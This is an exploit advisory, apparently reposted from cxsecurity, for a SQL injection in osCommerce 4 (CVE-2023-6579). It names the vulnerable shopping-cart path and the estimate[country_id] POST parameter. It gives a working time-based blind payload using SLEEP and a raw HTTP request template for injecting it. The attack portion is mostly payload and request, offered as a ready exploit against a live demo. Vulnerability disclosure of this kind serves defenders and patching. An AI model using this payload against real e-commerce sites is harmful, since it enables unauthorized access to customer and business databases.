osCommerce 4 - SQL Injection
2023-12-8 06:21:19 Author: cxsecurity.com(查看原文) 阅读量:14 收藏

osCommerce 4 - SQL Injection

# Exploit Title: osCommerce 4 - SQL Injection # Exploit Author: CraCkEr # Date: 22/11/2023 # Vendor: osCommerce ltd. # Vendor Homepage: https://www.oscommerce.com/ # Software Link: https://demo.oscommerce.com/ # Demo Link: https://demo.oscommerce.com/b2b-supermarket/ # Tested on: Windows 11 Home # Impact: Database Access # CWE: CWE-89 - CWE-74 - CWE-707 # CVE: CVE-2023-6579 # VDB: VDB-247160 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /b2b-supermarket/shopping-cart POST Parameter 'estimate[country_id]' is vulnerable to SQLi --- Parameter: estimate[country_id] (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: estimate[country_id]=223'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&estimate[post_code]=900001&estimate[shipping]=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw== --- ------------------------------------------- POST /b2b-supermarket/shopping-cart HTTP/2 estimate%5Bcountry_id%5D=[SQLi]&estimate%5Bpost_code%5D=900001&estimate%5Bshipping%5D=flat_flat&ajax_estimate=ajax_estimate&_csrf=7u6VPwL2TxKyd-mt8RufHw3nHwO95CIbzlY1L1y2BueKuf0MNs42S8pCnNybbOxmWaFUYcuwbiq8YAJVDNBHsw%3D%3D ------------------------------------------- [-] Done



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2023120015
如有侵权请联系:admin#unsafe.sh